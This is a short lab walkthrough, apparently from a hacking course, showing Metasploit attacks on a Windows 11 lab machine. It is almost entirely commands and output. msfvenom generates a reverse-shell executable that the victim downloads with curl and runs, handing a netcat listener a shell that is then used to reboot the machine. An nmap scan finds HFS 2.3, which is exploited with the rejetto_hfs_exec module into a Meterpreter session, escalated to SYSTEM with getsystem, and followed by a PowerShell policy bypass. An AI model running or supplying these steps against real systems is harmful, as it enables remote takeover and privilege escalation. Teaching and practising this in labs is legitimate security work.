Metasploit Framework

msfvenom (產生payload的工具)

Attacker

──(kali㉿kali)-[~/NTUST-Hacking]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.230.128 LPORT=8787 -f exe -o virus.exe

──(kali㉿kali)-[~/NTUST-Hacking]
└─$ python -m http.server 80                                                                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Victim

C:\Users\Red>curl http://192.168.230.128:80/virus.exe > virus.exe

Attacker

──(kali㉿kali)-[~/NTUST-Hacking]
└─$ netcat -lvnp 8787                                                                                  
listening on [any] 8787 ...

Victim

C:\Users\Red>virus.exe

Attacker

──(kali㉿kali)-[~/NTUST-Hacking]
└─$ netcat -lvnp 8787                                                                                  
listening on [any] 8787 ...
connect to [192.168.230.128] from (UNKNOWN) [192.168.230.129] 50152
Microsoft Windows [Version 10.0.22621.4169]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Red>shutdown /r /t 0
shutdown /r /t 0

msfconsole (發動漏洞利用的工具)

Attacker

┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ nmap -sV -sC 192.168.230.129 
PORT     STATE SERVICE       VERSION
...
8080/tcp open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
...

上網查HFS 2.3，有無vulnerability

┌──(kali㉿kali)-[~/NTUST-Hacking]
└─$ msfconsole 
...
msf6 > search HFS 2.3
Matching Modules                                                                                                           
================                                                                                                           
                                                                                                                           
   #  Name                                                 Disclosure Date  Rank       Check  Description                  
   -  ----                                                 ---------------  ----       -----  ----------- 
   ...
   4  exploit/windows/http/rejetto_hfs_exec                2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution
   ...
   
msf6 > info exploit/windows/http/rejetto_hfs_exec

決定利用exploit/windows/http/rejetto_hfs_exec模組

msf6 > use exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.230.129  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                         /using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                          local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.230.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
 
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.230.129
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.230.128:4444 
[*] Using URL: http://192.168.230.128:8080/kwasbp
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /kwasbp
[*] Sending stage (176198 bytes) to 192.168.230.129
[!] Tried to delete %TEMP%\yuqCgIpSBxjZnA.vbs, unknown result
[*] Meterpreter session 1 opened (192.168.230.128:4444 -> 192.168.230.129:49868) at 2024-09-20 23:29:21 -0400
[*] Server stopped.
 
meterpreter > sysinfo
Computer        : NTUST-HACKING-1
OS              : Windows 11 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NTUST-HACKING-1\Red
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4552 created.
Channel 2 created.
Microsoft Windows [Version 10.0.22621.4169]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Red\Desktop\hfs2.3_288>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\Red\Desktop\hfs2.3_288>

Metasploit Framework

msfvenom (產生payload的工具)

msfconsole (發動漏洞利用的工具)

Read more

A Tradecraft Primer

Operational Security

Digital Footprint

惡意軟體